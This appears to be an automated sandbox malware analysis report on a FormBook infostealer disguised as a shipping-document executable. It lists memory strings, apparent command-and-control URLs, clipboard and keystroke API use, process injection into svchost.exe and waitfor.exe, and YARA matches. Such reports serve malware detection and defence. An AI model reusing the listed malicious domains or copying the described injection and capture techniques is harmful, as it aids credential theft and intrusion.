63 6f 6c 6f 72 48 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 35 33 20 35 38 20 36 32 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 3a 30 20 31 70 78 20 31 30 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 36 25 29 2c 0a 20 20 20 20 20 20 20 20 20 20 30 20 32 70 78 20 34 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 38 25 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 44 61 72 6b 39 30 30 3a 36 20 31 31 20 31 36 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 36 30 30 3a 38 34 20 39 30 20 39 37 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Wed, 11 Dec 2024 23:21:16 GMTServer: NetlifyX-Nf-Request-Id: 01JEW0DP9F8NNKJJTX4FMN3PDEConnection: closeTransfer-Encoding: chunkedData Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 35 33 20 35 38 20 36 32 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 3a 30 20 31 70 78 20 31 30 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 36 25 29 2c 0a 20 20 20 20 20 20 20 20 20 20 30 20 32 70 78 20 34 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 38 25 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 44 61 72 6b 39 30 30 3a 36 20 31 31 20 31 36 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 36 30 30 3a 38 34 20 39 30 20 39 37 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65
                Source: waitfor.exe, 00000005.00000002.4473892138.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.000000000372E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
                Source: pNkvbgLNQpIoyz.exe, 00000006.00000002.4474990481.0000000004FFD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zrichiod-riech.sbs
                Source: pNkvbgLNQpIoyz.exe, 00000006.00000002.4474990481.0000000004FFD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zrichiod-riech.sbs/26nq/
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: waitfor.exe, 00000005.00000002.4473892138.00000000065E8000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003F08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: waitfor.exe, 00000005.00000003.2421945049.0000000007D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: waitfor.exe, 00000005.00000002.4473892138.0000000006132000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003A52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7s
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BC3F66
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BB001C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BDCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00B53B3A
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c0026a5a-2
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_12c0b761-6
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e70e6766-3
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_dbe23763-a
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: SHIPPING DOCUMENTS_PDF.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004DC583 NtClose,2_2_004DC583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C94650 NtSuspendThread,LdrInitializeThunk,5_2_04C94650
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C94340 NtSetContextThread,LdrInitializeThunk,5_2_04C94340
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04C92CA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C60 NtCreateKey,LdrInitializeThunk,5_2_04C92C60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04C92C70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DD0 NtDelayExecution,LdrInitializeThunk,5_2_04C92DD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04C92DF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04C92D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04C92D30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04C92EE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04C92E80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FE0 NtCreateFile,LdrInitializeThunk,5_2_04C92FE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FB0 NtResumeThread,LdrInitializeThunk,5_2_04C92FB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F30 NtCreateSection,LdrInitializeThunk,5_2_04C92F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AD0 NtReadFile,LdrInitializeThunk,5_2_04C92AD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AF0 NtWriteFile,LdrInitializeThunk,5_2_04C92AF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04C92BE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04C92BF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04C92BA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92B60 NtClose,LdrInitializeThunk,5_2_04C92B60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C935C0 NtCreateMutant,LdrInitializeThunk,5_2_04C935C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C939B0 NtGetContextThread,LdrInitializeThunk,5_2_04C939B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CC0 NtQueryVirtualMemory,5_2_04C92CC0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CF0 NtOpenProcess,5_2_04C92CF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C00 NtQueryInformationProcess,5_2_04C92C00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DB0 NtEnumerateKey,5_2_04C92DB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D00 NtSetInformationFile,5_2_04C92D00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92EA0 NtAdjustPrivilegesToken,5_2_04C92EA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92E30 NtWriteVirtualMemory,5_2_04C92E30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F90 NtProtectVirtualMemory,5_2_04C92F90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FA0 NtQuerySection,5_2_04C92FA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F60 NtCreateProcessEx,5_2_04C92F60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AB0 NtWaitForSingleObject,5_2_04C92AB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92B80 NtQueryInformationFile,5_2_04C92B80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93090 NtSetValueKey,5_2_04C93090
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93010 NtOpenDirectoryObject,5_2_04C93010
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93D70 NtOpenThread,5_2_04C93D70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93D10 NtOpenProcessToken,5_2_04C93D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C88E00 NtCreateFile,5_2_02C88E00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C88F70 NtReadFile,5_2_02C88F70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89260 NtAllocateVirtualMemory,5_2_02C89260
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89060 NtDeleteFile,5_2_02C89060
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89100 NtClose,5_2_02C89100
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00BBA1EF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00BA8310
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BB51BD
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5E6A00_2_00B5E6A0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7D9750_2_00B7D975
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B721C50_2_00B721C5
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B862D20_2_00B862D2
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD03DA0_2_00BD03DA
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B8242E0_2_00B8242E
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B725FA0_2_00B725FA
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B666E10_2_00B666E1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BAE6160_2_00BAE616
